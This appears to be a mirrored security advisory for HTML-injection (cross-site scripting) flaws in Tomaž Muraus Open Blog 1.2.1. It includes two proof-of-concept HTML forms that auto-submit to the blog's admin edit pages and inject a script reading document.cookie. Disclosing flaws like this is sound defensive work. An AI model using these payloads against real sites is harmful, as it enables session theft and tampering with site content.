扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 |
source: https://www.securityfocus.com/bid/42255/info Tomaž Muraus Open Blog is prone to multiple HTML-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. Tomaž Muraus Open Blog 1.2.1 is vulnerable; prior versions may also be affected. <form action="http://www.example.com/admin/pages/edit" method="post" > <input type="hidden" name="title" value="open blog page title" /> <input type="hidden" name="content" value='Some page content and <script>alert(document.cookie)</script>' /> <input type="hidden" name="status" value="active" /> <input type="hidden" name="id" value="1" /> <input type="submit" name="submit" id="sbmtit" value="Edit ››" /> </form> <script> document.getElementById('sbmtit').click(); </script> <form action="http://www.example.com/admin/posts/edit" method="post" > <input type="hidden" name="title" value="Welcome to Open Blog" /> <input type="hidden" name="excerpt" value='Some text"><script>alert(document.cookie)</script>' /> <input type="hidden" name="content" value="" /> <input type="hidden" name="categories[]" value="1" /> <input type="hidden" name="tags" value="openblog" /> <input type="hidden" name="publish_date" value="13/07/2010" /> <input type="hidden" name="status" value="published" /> <input type="hidden" name="id" value="1" /> <input type="submit" name="submit" id="sbmtit" value="Edit ››" /> </form> <script> document.getElementById('sbmtit').click(); </script> |
体验盒子
